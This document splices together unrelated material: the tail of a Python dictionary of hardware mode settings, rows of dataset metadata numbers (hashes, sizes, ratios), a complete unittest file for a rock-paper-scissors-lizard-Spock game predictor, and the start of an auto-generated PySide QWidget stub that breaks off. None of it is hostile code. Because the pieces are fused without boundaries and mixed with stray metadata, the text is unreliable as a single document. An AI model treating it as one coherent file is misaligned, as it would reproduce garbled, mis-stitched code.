"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_11_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_11_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_11_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_11_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
#############################################################################
"LOOM": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_00_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_00_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_10_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_10_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_10_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_11_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_11_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
},
"BG_BS_L4_11_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "11",
"DVAFS": "0",
}
}
| 40.395425
| 77
| 0.282582
| 2,104
| 24,722
| 2.819392
| 0.050856
| 0.106204
| 0.109238
| 0.157788
| 0.899191
| 0.899191
| 0.899191
| 0.898854
| 0.898854
| 0.897505
| 0
| 0.164712
| 0.548135
| 24,722
| 612
| 78
| 40.395425
| 0.366306
| 0.033412
| 0
| 0.7487
| 0
| 0
| 0.280131
| 0.093508
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6204ebeb1960659f6c4520ffb48e8e3de3a9caee
| 30,765
|
py
|
Python
|
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from random import Random
from services.logic_service import LogicService
class LogicServiceTest(unittest.TestCase):
def setUp(self):
self.logic_service = LogicService()
self.random = Random(666)
def test_constructor(self):
self.assertEqual(0, self.logic_service._number_of_choices)
self.assertEqual(1, self.logic_service._game_mode)
def test_change_game_mode(self):
self.logic_service.change_game_mode(2)
self.assertEqual(2, self.logic_service._game_mode)
def test_check_winner_kivi_vs_sakset(self):
winner = self.logic_service.check_winner(1, 0)
self.assertEqual("Voitit", winner)
def test_check_winner_kivi_vs_kivi(self):
winner = self.logic_service.check_winner(1, 1)
self.assertEqual("Tasapeli", winner)
def test_check_winner_kivi_vs_paperi(self):
winner = self.logic_service.check_winner(1, 2)
self.assertEqual("Hävisit", winner)
def test_check_winner_kivi_vs_spock(self):
winner = self.logic_service.check_winner(1, 3)
self.assertEqual("Hävisit", winner)
def test_check_winner_kivi_vs_lisko(self):
winner = self.logic_service.check_winner(1, 4)
self.assertEqual("Voitit", winner)
def test_check_winner_sakset_vs_sakset(self):
winner = self.logic_service.check_winner(0, 0)
self.assertEqual("Tasapeli", winner)
def test_check_winner_sakset_vs_kivi(self):
winner = self.logic_service.check_winner(0, 1)
self.assertEqual("Hävisit", winner)
def test_check_winner_sakset_vs_paperi(self):
winner = self.logic_service.check_winner(0, 2)
self.assertEqual("Voitit", winner)
def test_check_winner_sakset_vs_spock(self):
winner = self.logic_service.check_winner(0, 3)
self.assertEqual("Hävisit", winner)
def test_check_winner_sakset_vs_lisko(self):
winner = self.logic_service.check_winner(0, 4)
self.assertEqual("Voitit", winner)
def test_check_winner_paperi_vs_sakset(self):
winner = self.logic_service.check_winner(2, 0)
self.assertEqual("Hävisit", winner)
def test_check_winner_paperi_vs_kivi(self):
winner = self.logic_service.check_winner(2, 1)
self.assertEqual("Voitit", winner)
def test_check_winner_paperi_vs_paperi(self):
winner = self.logic_service.check_winner(2, 2)
self.assertEqual("Tasapeli", winner)
def test_check_winner_paperi_vs_spock(self):
winner = self.logic_service.check_winner(2, 3)
self.assertEqual("Voitit", winner)
def test_check_winner_paperi_vs_lisko(self):
winner = self.logic_service.check_winner(2, 4)
self.assertEqual("Hävisit", winner)
def test_check_winner_spock_vs_sakset(self):
winner = self.logic_service.check_winner(3, 0)
self.assertEqual("Voitit", winner)
def test_check_winner_spock_vs_kivi(self):
winner = self.logic_service.check_winner(3, 1)
self.assertEqual("Voitit", winner)
def test_check_winner_spock_vs_paperi(self):
winner = self.logic_service.check_winner(3, 2)
self.assertEqual("Hävisit", winner)
def test_check_winner_spock_vs_spock(self):
winner = self.logic_service.check_winner(3, 3)
self.assertEqual("Tasapeli", winner)
def test_check_winner_spock_vs_lisko(self):
winner = self.logic_service.check_winner(3, 4)
self.assertEqual("Hävisit", winner)
def test_check_winner_lisko_vs_sakset(self):
winner = self.logic_service.check_winner(4, 0)
self.assertEqual("Hävisit", winner)
def test_check_winner_lisko_vs_kivi(self):
winner = self.logic_service.check_winner(4, 1)
self.assertEqual("Hävisit", winner)
def test_check_winner_lisko_vs_paperi(self):
winner = self.logic_service.check_winner(4, 2)
self.assertEqual("Voitit", winner)
def test_check_winner_lisko_vs_spock(self):
winner = self.logic_service.check_winner(4, 3)
self.assertEqual("Voitit", winner)
def test_check_winner_lisko_vs_lisko(self):
winner = self.logic_service.check_winner(4, 4)
self.assertEqual("Tasapeli", winner)
def test_add_choice(self):
self.logic_service.add_choice(1)
self.assertEqual(len(self.logic_service._choices), 1)
self.assertEqual(self.logic_service._trie.get_value("1"), 1)
self.assertEqual(self.logic_service._number_of_choices, 1)
def test_add_two_choices(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(len(self.logic_service._choices), 2)
self.assertEqual(self.logic_service._trie.get_value("11"), 1)
self.assertEqual(self.logic_service._trie.get_value("1"), 2)
self.assertEqual(self.logic_service._number_of_choices, 2)
def test_add_six_choice(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.assertEqual(len(self.logic_service._choices), 6)
self.assertEqual(self.logic_service._trie.get_value("0"), 2)
self.assertEqual(self.logic_service._trie.get_value("1"), 3)
self.assertEqual(self.logic_service._trie.get_value("10"), 2)
self.assertEqual(self.logic_service._trie.get_value("11021"), 1)
self.assertEqual(self.logic_service._trie.get_value("10210"), 1)
self.assertEqual(self.logic_service._trie.get_value("2"), 1)
self.assertEqual(self.logic_service._number_of_choices, 6)
def test_add_eleven_choice(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.assertEqual(len(self.logic_service._choices), 10)
self.assertEqual(self.logic_service._number_of_choices, 11)
def test_cpu_choice_only_kivi_2_len(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.cpu_choice(2), 2) #choose paperi
def test_cpu_choice_only_paperi_2_len(self):
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service.cpu_choice(2), 0) #choose sakset
def test_cpu_choice_only_sakset_2_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service.cpu_choice(2), 1) #choose kivi
def test_cpu_choice_alternate_sakset_kivi_2_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.cpu_choice(2), 1) #choose kivi
def test_cpu_choice_alternate_sakset_kivi_differently_2_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service.cpu_choice(2), 2) #choose paperi
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service.cpu_choice(2), 1) #choose kivi
@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_one_previous(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service.cpu_choice(2), 1) #choose paperi
@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_no_precedent_2_len(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.cpu_choice(2), 1) #choose paperi
@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_one_previous_mode2(self, randint):
self.logic_service.change_game_mode(2)
randint._mock_side_effect = self.random.randint
self.logic_service.add_choice(4)
self.assertEqual(self.logic_service.cpu_choice(2), 3) #choose spock
@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_no_precedent_2_len_mode2(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.assertEqual(self.logic_service.cpu_choice(2), 3) #choose spock
def test_calculate_no_precedent_2_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(2), 5) #false
def test_calculate_1_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 0) #sakset
def test_calculate_4_len(self):
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(4), 0) #sakset
@patch('services.logic_service.randint')
def test_calculate_random_choice_three_choices_2_len(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(2), 1) #choose kivi
@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_kp_2_len(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(2), 2) #choose paperi
@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_sk_2_len(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(2), 2) #choose paperi
@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_sp_2_len(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(2), 1) #choose paperi
@patch('services.logic_service.choice')
def test_calculate_lizard_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
@patch('services.logic_service.choice')
def test_calculate_spock_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
@patch('services.logic_service.choice')
def test_calculate_paper_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
@patch('services.logic_service.choice')
def test_calculate_rock_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
def test_calculate_scissors_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
def test_calculate_scissors_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 0) #sakset
def test_calculate_scissors_paper_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 0) #sakset
def test_calculate_scissors_spock_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_calculate_scissors_rock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_rock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
def test_calculate_scissors_rock_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_rock_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
@patch('services.logic_service.choice')
def test_calculate_scissors_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
@patch('services.logic_service.randint')
def test_calculate_random_choice_5_choices_1_len_mode2(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
@patch('services.logic_service.choice')
def test_calculate_random_4_spcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 4) #choose lisko
@patch('services.logic_service.choice')
def test_calculate_random_4_skcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
@patch('services.logic_service.choice')
def test_calculate_random_4_skpl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.assertEqual(self.logic_service._calculate(1), 1) #choose kivi
@patch('services.logic_service.choice')
def test_calculate_random_4_skpc_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
def test_calculate_rock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
def test_calculate_rock_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_paper_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 0) #sakset
def test_calculate_rock_paper_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
@patch('services.logic_service.choice')
def test_calculate_random_4_kpcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) # lisko
@patch('services.logic_service.choice')
def test_calculate_paper_lizard_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 0) # sakset
def test_calculate_paper_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_calculate_paper_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_calculate_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_find_best_chain_length_not_enough_choices(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.find_best_chain_length(), 2)
def test_find_best_chain_length_one(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.find_best_chain_length(), 1)
@patch('services.logic_service.choice')
def test_find_best_chain_length_two(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service.find_best_chain_length(), 2)
| 42.201646
| 84
| 0.710418
| 4,385
| 30,765
| 4.621209
| 0.020753
| 0.30379
| 0.387683
| 0.337544
| 0.975276
| 0.969651
| 0.960768
| 0.95302
| 0.930961
| 0.850474
| 0
| 0.026977
| 0.191516
| 30,765
| 728
| 85
| 42.259615
| 0.787722
| 0.012709
| 0
| 0.786378
| 0
| 0
| 0.026512
| 0.02028
| 0
| 0
| 0
| 0
| 0.148607
| 1
| 0.126935
| false
| 0
| 0.006192
| 0
| 0.134675
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6213de6890da1be84c80ae4f4d9340747aa8a204
| 21,813
|
py
|
Python
|
resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | 1
|
2020-04-20T02:27:20.000Z
|
2020-04-20T02:27:20.000Z
|
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module PySide.QtGui
# from C:\Python27\lib\site-packages\PySide\QtGui.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
from QPaintDevice import QPaintDevice
class QWidget(__PySide_QtCore.QObject, QPaintDevice):
# no doc
def acceptDrops(self, *args, **kwargs): # real signature unknown
pass
def accessibleDescription(self, *args, **kwargs): # real signature unknown
pass
